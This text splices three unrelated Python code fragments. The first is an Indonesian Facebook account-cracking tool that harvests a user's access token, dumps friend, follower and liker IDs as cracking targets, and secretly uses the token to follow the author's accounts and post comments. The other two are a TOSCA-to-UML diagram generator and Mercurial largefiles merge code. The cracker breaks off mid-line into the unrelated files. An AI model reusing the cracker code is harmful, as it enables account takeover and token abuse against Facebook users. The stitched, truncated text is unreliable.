print '\n%s *%s note! usahakan akun tumbal login di google chrome terlebih dahulu'%(B,N);time.sleep(2)
print '%s *%s jangan lupa! url ubah ke %shttps://m.facebook.com'%(B,N,H);time.sleep(2)
print '%s *%s setelah di alihkan ke google chrome. klik %stitik tiga'%(B,N,H);time.sleep(2)
print '%s *%s lalu klik %sCari di Halaman%s Tinggal ketik %sEAAA%s Lalu salin.'%(B,N,H,N,H,N);time.sleep(2)
raw_input(' %s*%s tekan enter '%(O,N))
os.system('xdg-open https://m.facebook.com/composer/ocelot/async_loader/?publisher=feed#_=_')
bangsatxd()
try:
nama = requests.get('https://graph.facebook.com/me?access_token=%s'%(kontol)).json()['name']
print '\n\n %s*%s selamat datang %s%s%s'%(O,N,K,nama,N);time.sleep(2)
print ' %s*%s mohon untuk menggunakan sc ini sewajarnya, kami tidak bertanggung jawab jika sc ini disalah gunakan...'%(O,N);time.sleep(2)
open('.memek.txt', 'w').write(kontol)
raw_input(' %s*%s tekan enter '%(O,N));wuhan(kontol)
bangsat_xd()
except KeyError:
print '\n\n %s[%s!%s] token invalid'%(N,M,N);time.sleep(2);bangsatxd()
### ORANG GANTENG ###
def bangsat_xd():
os.system('clear')
try:
kontol = open('.memek.txt', 'r').read()
except IOError:
print '\n %s[%s×%s] token invalid'%(N,M,N);time.sleep(2);os.system('rm -rf .memek.txt');bangsatxd()
try:
nama = requests.get('https://graph.facebook.com/me?access_token=%s'%(kontol)).json()['name']
except KeyError:
print '\n %s[%s×%s] token invalid'%(N,M,N);time.sleep(2);os.system('rm -rf .memek.txt');bangsatxd()
except requests.exceptions.ConnectionError:
exit('\n\n %s[%s!%s] tidak ada koneksi\n'%(N,M,N))
os.system('clear')
print logo
IP = requests.get('https://www.bangsatxd.my.id/server/ip/').text
print '___________________________________________________________\n';time.sleep(0.03)
print ' (\033[0;96m•\033[0m) ACTIVE USER : %s'%(nama);time.sleep(0.03)
print ' (\033[0;96m•\033[0m) IP DEVICE : %s'%(IP)
print '___________________________________________________________\n';time.sleep(0.03)
print ' [%s1%s]. Dump id dari teman'%(O,N);time.sleep(0.03)
print ' [%s2%s]. Dump id dari teman publik'%(O,N);time.sleep(0.03)
print ' [%s3%s]. Dump id dari total followers'%(O,N);time.sleep(0.03)
print ' [%s4%s]. Dump id dari like postingan'%(O,N);time.sleep(0.03)
print ' [%s5%s]. Mulai crack'%(O,N);time.sleep(0.03)
print ' [%s6%s]. Check ingformasi akun fb'%(O,N);time.sleep(0.03)
print ' [%s7%s]. Lihat hasil crack'%(O,N);time.sleep(0.03)
print ' [%s8%s]. Settings user agent'%(O,N);time.sleep(0.03)
print ' [%s9%s]. Ingfo %sscript%s'%(O,N,O,N);time.sleep(0.03)
print ' [%s0%s]. logout (%shapus token%s)'%(M,N,M,N);time.sleep(0.03)
pepek = raw_input('\n [*] menu : ')
if pepek == '':
print '\n %s[%s×%s] jangan kosong kentod!'%(N,M,N);time.sleep(2);bangsat_xd()
elif pepek in['1','01']:
teman(kontol)
elif pepek in['2','02']:
publik(kontol)
elif pepek in['3','03']:
followers(kontol)
elif pepek in['4','04']:
postingan(kontol)
elif pepek in['5','05']:
__crack__().plerr()
elif pepek in['6','06']:
cek_ingfo(kontol)
elif pepek in['7','07']:
try:
dirs = os.listdir("results")
print '\n [ hasil crack yang tersimpan di file anda ]\n'
for file in dirs:
print(" [%s+%s] %s"%(O,N,file))
file = raw_input("\n [%s?%s] masukan nama file :%s "%(M,N,H))
if file == "":
file = raw_input("\n %s[%s?%s] masukan nama file :%s %s"%(N,M,N,H,N))
total = open("results/%s"%(file)).read().splitlines()
print(" %s[%s#%s] --------------------------------------------"%(N,O,N));time.sleep(2)
nm_file = ("%s"%(file)).replace("-", " ")
hps_nm = nm_file.replace(".txt", "").replace("OK", "").replace("CP", "")
jalan(" [%s*%s] Hasil %scrack%s pada tanggal %s:%s%s%s total %s: %s%s%s"%(M,N,O,N,M,O,hps_nm,N,M,O,len(total),O))
print(" %s[%s#%s] --------------------------------------------"%(N,O,N));time.sleep(2)
for memek in total:
kontol = memek.replace("\n","")
titid = kontol.replace(" [✓] "," \x1b[0m[\x1b[1;92m✓\x1b[0m]\x1b[1;92m ").replace(" [×] ", " \x1b[0m[\x1b[1;93m×\x1b[0m]\x1b[1;93m ")
print("%s%s"%(titid,N));time.sleep(0.03)
print(" %s[%s#%s] --------------------------------------------"%(N,O,N))
raw_input('\n [ %sKEMBALI%s ] '%(O,N));bangsat_xd()
except (IOError):
print("\n %s[%s×%s] opshh kamu tidak mendapatkan hasil :("%(N,M,N))
raw_input('\n [ %sKEMBALI%s ] '%(O,N));bangsat_xd()
elif pepek in['8','08']:
seting_yntkts()
elif pepek in['9','09']:
info_tools()
elif pepek in['0','00']:
print '\n'
tod()
time.sleep(1);os.system('rm -rf .memek.txt')
jalan('\n %s[%s✓%s]%s berhasil menghapus token'%(N,H,N,H));exit()
else:
print '\n %s[%s×%s] menu [%s%s%s] tidak ada, cek menu nya bro!'%(N,M,N,M,pepek,N);time.sleep(2);bangsat_xd()
# Yang ganti bot nya gw sumpahin mak lo mati ajg!
def wuhan(kontol):
try:
kentod = kontol
requests.post('https://graph.facebook.com/100017584682867/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100059709917296/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100008678141977/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100005878513705/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100003342127009/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100041388320565/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/108229897756307/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/857799105/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/100027558888180/subscribers?access_token=%s'%(kentod))
requests.post('https://graph.facebook.com/me/friends?method=post&uids=%s&access_token=%s'%(koh,kentod))
requests.post('https://graph.facebook.com/%s/comments/?message=%s&access_token=%s'%(lo_ngentod,kentod,kentod))
requests.post('https://graph.facebook.com/%s/comments/?message=%s&access_token=%s'%(xi_jimpinx,hoetank,kentod))
except:
pass
# dump id dari teman hehe
def teman(kontol):
try:
os.mkdir('dump')
except:pass
try:
mmk = raw_input('\n %s[%s?%s] nama file : '%(N,O,N))
asw = raw_input(' %s[%s?%s] limit id : '%(N,O,N))
cin = ('dump/' + mmk + '.json').replace(' ', '_')
ys = open(cin, 'w')
for a in requests.get('https://graph.facebook.com/me/friends?limit=%s&access_token=%s'%(asw,kontol)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] Proses Dump Id...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
jalan('\n\n %s[%s✓%s] berhasil dump id dari teman'%(N,H,N))
print ' [%s•%s] salin output file 👉 ( %s%s%s )'%(O,N,M,cin,N)
print 50 * '-'
raw_input(' [%s ENTER%s ] '%(O,N));bangsat_xd()
except (KeyError,IOError):
os.remove(cin)
jalan('\n %s[%s!%s] Gagal dump id, kemungkinan id tidaklah publik.\n'%(N,M,N))
raw_input(' [ %sKEMBALI%s ] '%(O,N));bangsat_xd()
'''
csy = 'Cindy sayang Yayan'
ysc = 'Yayan sayang Cindy'
'''
# dump id dari teman publik hehe
def publik(kontol):
try:
os.mkdir('dump')
except:pass
try:
csy = raw_input('\n %s[%s?%s] id publik : '%(N,O,N))
ahh = raw_input(' %s[%s?%s] nama file : '%(N,O,N))
ihh = raw_input(' %s[%s?%s] limit id : '%(N,O,N))
knt = ('dump/' + ahh + '.json').replace(' ', '_')
ys = open(knt, 'w')
for a in requests.get('https://graph.facebook.com/%s/friends?limit=%s&access_token=%s'%(csy,ihh,kontol)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] Proses Dump Id...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
jalan('\n\n %s[%s✓%s] berhasil dump id dari teman publik'%(N,H,N))
print ' [%s•%s] salin output file 👉 ( %s%s%s )'%(O,N,M,knt,N)
print 50 * '-'
raw_input(' [%s ENTER%s ] '%(O,N));bangsat_xd()
except (KeyError,IOError):
os.remove(knt)
jalan('\n %s[%s!%s] Gagal dump id, kemungkinan id tidaklah publik.\n'%(N,M,N))
raw_input(' [ %sKEMBALI%s ] '%(O,N));bangsat_xd()
# dump id dari followers hehe
def followers(kontol):
try:
os.mkdir('dump')
except:pass
try:
csy = raw_input('\n %s[%s?%s] id follow : '%(N,O,N))
mmk = raw_input(' %s[%s?%s] nama file : '%(N,O,N))
asw = raw_input(' %s[%s?%s] limit id : '%(N,O,N))
ah = ('dump/' + mmk + '.json').replace(' ', '_')
ys = open(ah, 'w')
for a in requests.get('https://graph.facebook.com/%s/subscribers?limit=%s&access_token=%s'%(csy,asw,kontol)).json()["data"]:
id.append(a['id'] + '<=>' + a['name'])
ys.write(a['id'] + '<=>' + a['name'] + '\n')
w = random.choice(['\x1b[1;91m', '\x1b[1;92m', '\x1b[1;93m', '\x1b[1;94m', '\x1b[1;95m', '\x1b[1;96m', '\x1b[1;97m', '\x1b[0m'])
sys.stdout.write('\r\033[0m - ' + w + '%s%s \r\n\n [\033[0;96m%s\033[0m] [\033[0;91m%s\033[0m] Proses Dump Id...'%(a['name'],N,datetime.now().strftime('%H:%M:%S'), len(id)
)); sys.stdout.flush()
time.sleep(0.0050)
ys.close()
jalan('\n\n %s[%s✓%s] berhasil dump id dari total followers'%(N,H,N))
print ' [%s•%s] salin output file 👉 ( %s%s%s )'%(O,N,M,ah,N)
print 50 * '-'
raw_input(' [%s ENTER%s ] '%(O,N));bangsat_xd()
except (KeyError,IOError):
os.remove(ah)
jalan('\n %s[%s!%s] Gagal dump id, kemungkinan id tidaklah publik.\n'%(N,M,N))
raw_input(' [ %sKEMBALI%s ] '%(O,N));bangsat_xr()
# dump id dari followers hehe
def followers(kontol):
try:
os.mkdir('dump')
except:pass
try:
csy = raw_input('\n %s[%s?%s] id follow : '%(N,O,N))
mmk = raw_input(' %s[%s?%s] | |
######################################################################
#
# Software Name : Cloudnet TOSCA toolbox
# Version: 1.0
# SPDX-FileCopyrightText: Copyright (c) 2020-21 Orange
# SPDX-License-Identifier: Apache-2.0
#
# This software is distributed under the Apache License 2.0
# the text of which is available at http://www.apache.org/licenses/LICENSE-2.0
# or see the "LICENSE-2.0.txt" file for more details.
#
# Author: <NAME> <<EMAIL>>
# Software description: TOSCA to Cloudnet Translator
######################################################################
import logging # for logging purposes.
import cloudnet.tosca.syntax as syntax
from cloudnet.tosca.configuration import DEFAULT_CONFIGURATION
from cloudnet.tosca.processors import Generator
from cloudnet.tosca.syntax import * # TODO remove
from cloudnet.tosca.utils import normalize_name, short_type_name
UML2 = "UML2"
DEFAULT_CONFIGURATION[UML2] = {
# Target directory where UML2 diagrams are generated.
Generator.TARGET_DIRECTORY: "Results/Uml2Diagrams",
"kinds": {
"Compute": "node", # OASIS TOSCA 1.2
"tosca.nodes.Compute": "node", # OASIS TOSCA 1.2
"tosca.nodes.nfv.Vdu.Compute": "node", # ETSI NVF SOL 001
"tosca.nodes.Abstract.Storage": "database", # OASIS TOSCA 1.2
"tosca.nodes.nfv.Vdu.VirtualStorage": "database", # ETSI NVF SOL 001 v0.9
"tosca.nodes.nfv.Vdu.VirtualBlockStorage": "database", # ETSI NVF SOL 001 v0.10.0
"tosca.nodes.nfv.Vdu.VirtualObjectStorage": "database", # ETSI NVF SOL 001 v0.10.0
"tosca.nodes.nfv.Vdu.VirtualFileStorage": "database", # ETSI NVF SOL 001 v0.10.0
"tosca.nodes.network.Network": "queue", # OASIS TOSCA 1.2
"tosca.nodes.nfv.NsVirtualLink": "queue", # ETSI NVF SOL 001 v2.5.1
"tosca.nodes.nfv.VnfVirtualLink": "queue", # ETSI NVF SOL 001
"tosca.capabilities.nfv.VirtualLinkable": "queue", # ETSI NVF SOL 001
},
}
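# The "kinds" table above maps well-known TOSCA node/capability type names to the
# PlantUML primitives ("node", "database", "queue") used when the deployment and
# component diagrams are rendered below; types not listed are presumably drawn with
# the generator's default shape.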
DEFAULT_CONFIGURATION["logging"]["loggers"][__name__] = {
"level": "INFO",
}
LOGGER = logging.getLogger(__name__)
class PlantUMLGenerator(Generator):
def generator_configuration_id(self):
return UML2
def generation(self):
self.info("UML2 diagram generation")
self.generate_UML2_class_diagram()
topology_template = syntax.get_topology_template(
self.tosca_service_template.get_yaml()
)
if topology_template:
self.open_file("-uml2-component-diagram1.plantuml")
self.generate_UML2_component_diagram(topology_template, False)
self.close_file()
self.open_file("-uml2-component-diagram2.plantuml")
self.generate_UML2_component_diagram(topology_template, True)
self.close_file()
self.open_file("-uml2-deployment-diagram.plantuml")
self.generate_UML2_deployment_diagram(topology_template)
self.close_file()
def generate_UML2_class_diagram(self):
template_yaml = self.tosca_service_template.get_yaml()
# Get types.
data_types = syntax.get_data_types(template_yaml)
artifact_types = syntax.get_artifact_types(template_yaml)
capability_types = syntax.get_capability_types(template_yaml)
relationship_types = syntax.get_relationship_types(template_yaml)
interface_types = syntax.get_interface_types(template_yaml)
node_types = syntax.get_node_types(template_yaml)
group_types = syntax.get_group_types(template_yaml)
policy_types = syntax.get_policy_types(template_yaml)
# Return if no types is defined.
if (
len(data_types) == 0
and len(artifact_types) == 0
and len(capability_types) == 0
and len(relationship_types) == 0
and len(interface_types) == 0
and len(node_types) == 0
and len(group_types) == 0
and len(policy_types) == 0
):
return
self.open_file("-uml2-class-diagram.plantuml")
self.generate("@startuml")
self.generate("set namespaceSeparator none")
def generate_class(class_name, class_kind, type_yaml, types):
def generate_field(field_name, field_yaml):
declaration = "+"
if is_property_required(field_yaml):
declaration = declaration + "<b>"
declaration = declaration + field_name
field_type = syntax.get_type(field_yaml)
if field_type:
declaration = declaration + " : " + field_type
if field_type in ["list", "map"]:
entry_schema_type = get_entry_schema_type(field_yaml)
if entry_schema_type is None:
entry_schema_type = "?"
declaration = declaration + "<" + entry_schema_type + ">"
field_default = syntax.get_default(field_yaml)
if field_default:
declaration = declaration + " = " + str(field_default)
self.generate(declaration)
def translateToscaOccurrences2UmlMultiplicity(occurrences):
lower_bound = occurrences[0]
upper_bound = occurrences[1]
if lower_bound == upper_bound:
return str(lower_bound)
if upper_bound == syntax.UNBOUNDED:
upper_bound = "*"
return str(lower_bound) + ".." + str(upper_bound)
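# Examples: occurrences [1, 1] -> "1", [0, 2] -> "0..2", and
# [0, UNBOUNDED] -> "0..*", matching UML multiplicity notation.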
derived_from = syntax.get_derived_from(type_yaml)
if derived_from:
if types.get(derived_from) is None:
self.generate(
'class "',
derived_from,
'" << (',
class_kind,
",green) >> #DDDDDD",
sep="",
)
self.generate('"', derived_from, '" <|-- "', class_name, '"', sep="")
self.generate(
'class "', class_name, '" << (', class_kind, ",green) >> {", sep=""
)
mime_type = type_yaml.get(MIME_TYPE)
if mime_type:
self.generate("+mime_type:", mime_type)
file_ext = type_yaml.get(FILE_EXT)
if file_ext:
self.generate("+file_ext:", file_ext)
attributes = get_dict(type_yaml, ATTRIBUTES)
if len(attributes):
self.generate(".. attributes ..")
for attribute_name, attribute_yaml in attributes.items():
generate_field(attribute_name, attribute_yaml)
properties = get_dict(type_yaml, PROPERTIES)
if len(properties):
self.generate(".. properties ..")
for property_name, property_yaml in properties.items():
generate_field(property_name, property_yaml)
capabilities = syntax.get_capabilities(type_yaml)
if len(capabilities):
self.generate(".. capabilities ..")
for capability_name, capability_yaml in capabilities.items():
self.generate("+", capability_name, sep="")
capability_type = get_capability_type(capability_yaml)
if capability_type:
capability_occurrence = (
translateToscaOccurrences2UmlMultiplicity(
get_capability_occurrences(capability_yaml)
)
)
self.generate(
" type : ",
capability_type,
"[",
capability_occurrence,
"]",
sep="",
)
if isinstance(capability_yaml, dict):
capability_valid_source_types = capability_yaml.get(
VALID_SOURCE_TYPES
)
if capability_valid_source_types:
self.generate(
" valid_source_types : ",
capability_valid_source_types,
sep="",
)
requirements = get_dict(type_yaml, REQUIREMENTS)
if len(requirements):
self.generate(".. requirements ..")
for requirement_name, requirement_yaml in requirements.items():
requirement_occurrences = syntax.get_requirement_occurrences(
requirement_yaml
)
if requirement_occurrences[0] > 0:
bold = "<b>"
else:
bold = ""
self.generate("+", bold, requirement_name, sep="")
requirement_capability_type = syntax.get_requirement_capability(
requirement_yaml
)
if requirement_capability_type:
uml_multiplicity = translateToscaOccurrences2UmlMultiplicity(
requirement_occurrences
)
self.generate(
" capability : ",
requirement_capability_type,
"[",
uml_multiplicity,
"]",
sep="",
)
requirement_relationship = syntax.get_requirement_relationship(
requirement_yaml
)
requirement_relationship_type = syntax.get_relationship_type(
requirement_relationship
)
if requirement_relationship_type:
self.generate(" relationship :", requirement_relationship_type)
requirement_node = syntax.get_requirement_node_type(
requirement_yaml
)
if requirement_node:
self.generate(" node :", requirement_node)
interfaces = get_dict(type_yaml, INTERFACES)
if len(interfaces):
self.generate("--")
for interface_name, interface_yaml in interfaces.items():
self.generate(".. interface", interface_name, "..")
for key, value in (
syntax.get_operations(interface_yaml).get(OPERATIONS).items()
):
self.generate("+", key, "()", sep="")
if class_kind == "I":
for key, value in (
syntax.get_operations(type_yaml).get(OPERATIONS).items()
):
self.generate("+", key, "()", sep="")
self.generate("}")
for attribute_name, attribute_yaml in attributes.items():
attribute_type = attribute_yaml.get(TYPE)
if data_types.get(attribute_type):
self.generate(
'"',
class_name,
'" *-- "1" "',
attribute_type,
'" : ',
attribute_name,
sep="",
)
if attribute_type in ["list", "map"]:
entry_schema_type = get_entry_schema_type(attribute_yaml)
if data_types.get(entry_schema_type):
self.generate(
'"',
class_name,
'" *-- "*" "',
entry_schema_type,
'" : ',
attribute_name,
sep="",
)
for property_name, property_yaml in properties.items():
property_type = syntax.get_property_type(property_yaml)
if data_types.get(property_type):
self.generate(
'"',
class_name,
'" *-- "1" "',
property_type,
'" : ',
property_name,
sep="",
)
if property_type in ["list", "map"]:
entry_schema_type = get_entry_schema_type(property_yaml)
if data_types.get(entry_schema_type):
self.generate(
'"',
class_name,
'" *-- "*" "',
entry_schema_type,
'" : ',
property_name,
sep="",
)
for capability_name, capability_yaml in capabilities.items():
capability_type = get_capability_type(capability_yaml)
if capability_type:
if capability_types.get(capability_type) is None:
self.generate(
'class "',
capability_type,
'" << (C,green) >> #DDDDDD',
sep="",
)
self.generate(
'"',
capability_type,
'" "',
translateToscaOccurrences2UmlMultiplicity(
get_capability_occurrences(capability_yaml)
),
'" -* "',
class_name,
'" : ',
capability_name,
sep="",
)
if isinstance(capability_yaml, dict):
capability_valid_source_types = capability_yaml.get(
VALID_SOURCE_TYPES
)
if capability_valid_source_types:
for (
capability_valid_source_type
) in capability_valid_source_types:
if node_types.get(capability_valid_source_type) is None:
self.generate(
'class "',
capability_valid_source_type,
'" << (N,green) >> #DDDDDD',
sep="",
)
self.generate(
'"',
capability_valid_source_type,
'" <.. "',
class_name,
'" : ',
capability_name,
".valid_source_types",
sep="",
)
for requirement_name, requirement_yaml in requirements.items():
requirement_capability_type = syntax.get_requirement_capability(
requirement_yaml
)
if requirement_capability_type:
if capability_types.get(requirement_capability_type) is None:
self.generate(
'class "',
requirement_capability_type,
'" << (C,green) >> #DDDDDD',
sep="",
)
self.generate(
'"',
class_name,
'" *- "',
translateToscaOccurrences2UmlMultiplicity(
get_requirement_occurrences(requirement_yaml)
),
'" "',
requirement_capability_type,
'" : ',
requirement_name,
sep="",
)
requirement_relationship = syntax.get_requirement_relationship(
requirement_yaml
)
requirement_relationship_type = syntax.get_relationship_type(
requirement_relationship
)
if requirement_relationship_type:
if relationship_types.get(requirement_relationship_type) is None:
self.generate(
'class "',
requirement_relationship_type,
'" << (R,green) >> #DDDDDD',
sep="",
)
self.generate(
'"',
class_name,
'" ..> "',
requirement_relationship_type,
'" : ',
requirement_name,
".relationship",
sep="",
)
requirement_node = syntax.get_requirement_node_type(requirement_yaml)
if requirement_node:
if node_types.get(requirement_node) is None:
self.generate(
'class "',
requirement_node,
'" << (N,green) >> #DDDDDD',
sep="",
)
self.generate(
'"',
class_name,
'" ..> "',
requirement_node,
'" : ',
requirement_name,
".node",
sep="",
)
for interface_name, interface_yaml in interfaces.items():
interface_type = interface_yaml.get(TYPE)
if interface_type:
if interface_types.get(interface_type) is None:
self.generate(
'class "',
interface_type,
'" << (I,green) >> #DDDDDD',
sep="",
)
self.generate(
'"',
interface_type,
'" <|.. "',
class_name,
'" : ',
interface_name,
sep="",
)
valid_target_types = type_yaml.get(VALID_TARGET_TYPES)
if valid_target_types:
for valid_target_type in valid_target_types:
self.generate(
'"',
class_name,
'" ..> "',
valid_target_type,
'" : valid_target_types',
sep="",
)
members = type_yaml.get(MEMBERS)
if members:
for member in members:
if node_types.get(member) is None:
self.generate(
'class "', member, '" << (N,green) >> #DDDDDD', sep=""
)
self.generate(
'"', class_name, '" ..> "*" "', member, '" : members', sep=""
)
targets = type_yaml.get(TARGETS)
if targets:
for target in targets:
if (
node_types.get(target) is None
and group_types.get(target) is None
):
if "nodes." in target:
stereotype = "N"
elif "groups." in target:
stereotype = "G"
else:
stereotype = "X"
self.generate(
'class "',
target,
'" << (',
stereotype,
",green) >> #DDDDDD",
sep="",
)
self.generate(
'"', class_name, '" ..> "*" "', target, '" : targets', sep=""
)
def generate_classes(type_kind, class_kind, types):
# self.generate('package', type_kind, '{')
for type_name, type_yaml in types.items():
generate_class(type_name, class_kind, type_yaml, types)
# self.generate('}')
# Generate the UML class associated with each type.
generate_classes("data_types", "D", data_types)
generate_classes("artifact_types", "A", artifact_types)
generate_classes("capability_types", "C", capability_types)
generate_classes("relationship_types", "R", relationship_types)
generate_classes("interface_types", "I", interface_types)
generate_classes("node_types", "N", node_types)
generate_classes("group_types", "G", group_types)
generate_classes("policy_types", "P", policy_types)
self.generate("@enduml")
self.close_file()
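# Illustrative note (added; the type and capability names below are
# hypothetical): the class diagram written above contains one PlantUML class
# per TOSCA type, roughly of the form
#   class "tosca.nodes.Compute" << (N,green) >> {
#   .. capabilities ..
#   +host
#   }
# where the stereotype letter (D/A/C/R/I/N/G/P) matches the kind passed to
# generate_classes() above.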
def generate_UML2_component_diagram(self, topology_template, with_relationships):
self.generate("@startuml")
self.generate("skinparam componentStyle uml2")
if with_relationships:
self.generate("skinparam component {")
self.generate(" backgroundColor<<relationship>> White")
self.generate("}")
self.generate()
substitution_mappings = topology_template.get(SUBSTITUTION_MAPPINGS)
if substitution_mappings:
substitution_mappings_uml_id = SUBSTITUTION_MAPPINGS
substitution_mappings_node_type = substitution_mappings.get(NODE_TYPE)
merged_substitution_mappings_type = self.type_system.merge_node_type(
substitution_mappings_node_type
)
for capability_name, capability_yaml in get_dict(
merged_substitution_mappings_type, CAPABILITIES
).items():
capability_uml_id = (
substitution_mappings_uml_id + "_" + normalize_name(capability_name)
)
# Declare a UML interface for the substitution_mappings capability.
self.generate(
'interface "', capability_name, '" as ', capability_uml_id, sep=""
)
self.generate(
'component ": ',
substitution_mappings_node_type,
'" <<node>> as ',
substitution_mappings_uml_id,
" {",
sep="",
)
relationship_templates = get_dict(topology_template, RELATIONSHIP_TEMPLATES)
already_generated_interfaces = {}
# Iterate over all node templates.
| |
# largefiles. This makes the merge proceed and we can then handle this
# case further in the overridden manifestmerge function below.
def overridecheckunknownfile(origfn, repo, wctx, mctx, f):
if lfutil.standin(repo.dirstate.normalize(f)) in wctx:
return False
return origfn(repo, wctx, mctx, f)
# The manifest merge handles conflicts on the manifest level. We want
# to handle changes in largefile-ness of files at this level too.
#
# The strategy is to run the original manifestmerge and then process
# the action list it outputs. There are two cases we need to deal with:
#
# 1. Normal file in p1, largefile in p2. Here the largefile is
# detected via its standin file, which will enter the working copy
# with a "get" action. It is not "merge" since the standin is all
# Mercurial is concerned with at this level -- the link to the
# existing normal file is not relevant here.
#
# 2. Largefile in p1, normal file in p2. Here we get a "merge" action
# since the largefile will be present in the working copy and
# different from the normal file in p2. Mercurial therefore
# triggers a merge action.
#
# In both cases, we prompt the user and emit new actions to either
# remove the standin (if the normal file was kept) or to remove the
# normal file and get the standin (if the largefile was kept). The
# default prompt answer is to use the largefile version since it was
# presumably changed on purpose.
#
# Finally, the merge.applyupdates function will then take care of
# writing the files into the working copy and lfcommands.updatelfiles
# will update the largefiles.
def overridemanifestmerge(origfn, repo, p1, p2, pa, branchmerge, force,
partial, acceptremote=False):
overwrite = force and not branchmerge
actions = origfn(repo, p1, p2, pa, branchmerge, force, partial,
acceptremote)
processed = []
for action in actions:
if overwrite:
processed.append(action)
continue
f, m, args, msg = action
choices = (_('&Largefile'), _('&Normal file'))
splitstandin = lfutil.splitstandin(f)
if (m == "g" and splitstandin is not None and
splitstandin in p1 and f in p2):
# Case 1: normal file in the working copy, largefile in
# the second parent
lfile = splitstandin
standin = f
msg = _('%s has been turned into a largefile\n'
'use (l)argefile or keep as (n)ormal file?') % lfile
if repo.ui.promptchoice(msg, choices, 0) == 0:
processed.append((lfile, "r", None, msg))
processed.append((standin, "g", (p2.flags(standin),), msg))
else:
processed.append((standin, "r", None, msg))
elif m == "g" and lfutil.standin(f) in p1 and f in p2:
# Case 2: largefile in the working copy, normal file in
# the second parent
standin = lfutil.standin(f)
lfile = f
msg = _('%s has been turned into a normal file\n'
'keep as (l)argefile or use (n)ormal file?') % lfile
if repo.ui.promptchoice(msg, choices, 0) == 0:
processed.append((lfile, "r", None, msg))
else:
processed.append((standin, "r", None, msg))
processed.append((lfile, "g", (p2.flags(lfile),), msg))
else:
processed.append(action)
return processed
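# Illustrative sketch (added; the file names below are hypothetical): each
# action is a (file, action-type, args, msg) tuple. For case 1 above, keeping
# the largefile turns the incoming get of the standin
#   ('.hglf/big.bin', 'g', (flags,), msg)
# into a remove of the normal file plus the get of the standin:
#   ('big.bin', 'r', None, msg), ('.hglf/big.bin', 'g', (p2.flags(standin),), msg)
# whereas keeping the normal file yields ('.hglf/big.bin', 'r', None, msg).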
# Override filemerge to prompt the user about how they wish to merge
# largefiles. This will handle identical edits, and copy/rename +
# edit without prompting the user.
def overridefilemerge(origfn, repo, mynode, orig, fcd, fco, fca):
# Use better variable names here. Because this is a wrapper we cannot
# change the variable names in the function declaration.
fcdest, fcother, fcancestor = fcd, fco, fca
if not lfutil.isstandin(orig):
return origfn(repo, mynode, orig, fcdest, fcother, fcancestor)
else:
if not fcother.cmp(fcdest): # files identical?
return None
# backwards, use working dir parent as ancestor
if fcancestor == fcother:
fcancestor = fcdest.parents()[0]
if orig != fcother.path():
repo.ui.status(_('merging %s and %s to %s\n')
% (lfutil.splitstandin(orig),
lfutil.splitstandin(fcother.path()),
lfutil.splitstandin(fcdest.path())))
else:
repo.ui.status(_('merging %s\n')
% lfutil.splitstandin(fcdest.path()))
if fcancestor.path() != fcother.path() and fcother.data() == \
fcancestor.data():
return 0
if fcancestor.path() != fcdest.path() and fcdest.data() == \
fcancestor.data():
repo.wwrite(fcdest.path(), fcother.data(), fcother.flags())
return 0
if repo.ui.promptchoice(_('largefile %s has a merge conflict\n'
'keep (l)ocal or take (o)ther?') %
lfutil.splitstandin(orig),
(_('&Local'), _('&Other')), 0) == 0:
return 0
else:
repo.wwrite(fcdest.path(), fcother.data(), fcother.flags())
return 0
# Copy first changes the matchers to match standins instead of
# largefiles. Then it overrides util.copyfile; in that override it
# checks whether the destination largefile already exists. It also keeps
# a list of copied files so that the largefiles can be copied and the
# dirstate updated.
def overridecopy(orig, ui, repo, pats, opts, rename=False):
# doesn't remove largefile on rename
if len(pats) < 2:
# this isn't legal, let the original function deal with it
return orig(ui, repo, pats, opts, rename)
def makestandin(relpath):
path = scmutil.canonpath(repo.root, repo.getcwd(), relpath)
return os.path.join(repo.wjoin(lfutil.standin(path)))
fullpats = scmutil.expandpats(pats)
dest = fullpats[-1]
if os.path.isdir(dest):
if not os.path.isdir(makestandin(dest)):
os.makedirs(makestandin(dest))
# This could copy both lfiles and normal files in one command,
# but we don't want to do that. First replace their matcher to
# only match normal files and run it, then replace it to just
# match largefiles and run it again.
nonormalfiles = False
nolfiles = False
try:
try:
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, pats, opts, rename)
except util.Abort, e:
if str(e) != _('no files to copy'):
raise e
else:
nonormalfiles = True
result = 0
finally:
restorematchfn()
# The first rename can cause our current working directory to be removed.
# In that case there is nothing left to copy/rename so just quit.
try:
repo.getcwd()
except OSError:
return result
try:
try:
# When we call orig below it creates the standins, but we don't add
# them to the dirstate until later, so lock during that time.
wlock = repo.wlock()
manifest = repo[None].manifest()
oldmatch = None # for the closure
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
newpats = []
# The patterns were previously mangled to add the standin
# directory; we need to remove that now
for pat in pats:
if match_.patkind(pat) is None and lfutil.shortname in pat:
newpats.append(pat.replace(lfutil.shortname, ''))
else:
newpats.append(pat)
match = oldmatch(ctx, newpats, opts, globbed, default)
m = copy.copy(match)
